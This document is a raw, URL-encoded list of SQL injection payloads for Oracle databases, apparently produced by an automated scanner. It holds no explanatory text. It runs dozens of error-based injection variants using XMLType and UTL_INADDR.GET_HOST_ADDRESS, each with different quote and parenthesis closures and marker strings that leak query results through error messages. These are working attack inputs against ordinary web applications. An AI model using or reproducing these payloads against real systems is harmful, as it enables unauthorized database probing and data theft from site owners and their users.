-7716%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%282129%3D2129 -8798%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%282363%3D2363 -8021%29%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%281885%3D1885 -2248%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -1374%27%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27ewRh%27%3D%27ewRh -3700%27%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27RCqf%27%3D%27RCqf -2277%27%29%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27aQEo%27%3D%27aQEo -5318%27%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27hVLt%27%3D%27hVLt -7561%27%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27IcZC%27%20LIKE%20%27IcZC -8439%27%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27qtTo%27%20LIKE%20%27qtTo -6662%27%29%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27oJMw%27%20LIKE%20%27oJMw -1959%27%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27mCvD%27%20LIKE%20%27mCvD -6732%22%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22rXIs%22%3D%22rXIs -4488%22%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22azCE%22%3D%22azCE -2093%22%29%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22aTIB%22%3D%22aTIB -6934%22%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22XLFK%22%3D%22XLFK -7608%22%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22wJKd%22%20LIKE%20%22wJKd -2267%22%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22QHQT%22%20LIKE%20%22QHQT -2245%22%29%29%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22TeGB%22%20LIKE%20%22TeGB -5722%22%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22nKLo%22%20LIKE%20%22nKLo -9538%29%20WHERE%203761%3D3761%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -5815%27%29%20WHERE%203287%3D3287%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -1904%27%20WHERE%209955%3D9955%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -7737%22%20WHERE%201074%3D1074%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -1281%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 -8904%27%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 -6714%27%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 -3635%22%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 -3533%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%289071%3D9071 -2582%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%284124%3D4124 -3794%29%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%282833%3D2833 -9160%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 -2812%27%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%27ZHha%27%3D%27ZHha -2422%27%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27Knjd%27%3D%27Knjd -8487%27%29%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27zEcG%27%3D%27zEcG -4988%27%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%27IRIL%27%3D%27IRIL -6401%27%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%27QKTL%27%20LIKE%20%27QKTL -1040%27%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27vRkg%27%20LIKE%20%27vRkg -4028%27%29%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27ceWI%27%20LIKE%20%27ceWI -1309%27%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%27PxbG%27%20LIKE%20%27PxbG -6771%22%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%22zUGj%22%3D%22zUGj -2862%22%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22txsx%22%3D%22txsx -7378%22%29%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22Dygz%22%3D%22Dygz -6373%22%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%22KzwX%22%3D%22KzwX -7911%22%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%22KcEw%22%20LIKE%20%22KcEw -3482%22%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22LFtC%22%20LIKE%20%22LFtC -3646%22%29%29%29%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22GwIl%22%20LIKE%20%22GwIl -3057%22%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%20AND%20%22WvUu%22%20LIKE%20%22WvUu -2214%29%20WHERE%201299%3D1299%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 -5132%27%29%20WHERE%204074%3D4074%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 -9994%27%20WHERE%203115%3D3115%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 -5923%22%20WHERE%203633%3D3633%20OR%206272%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286272%3D6272%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 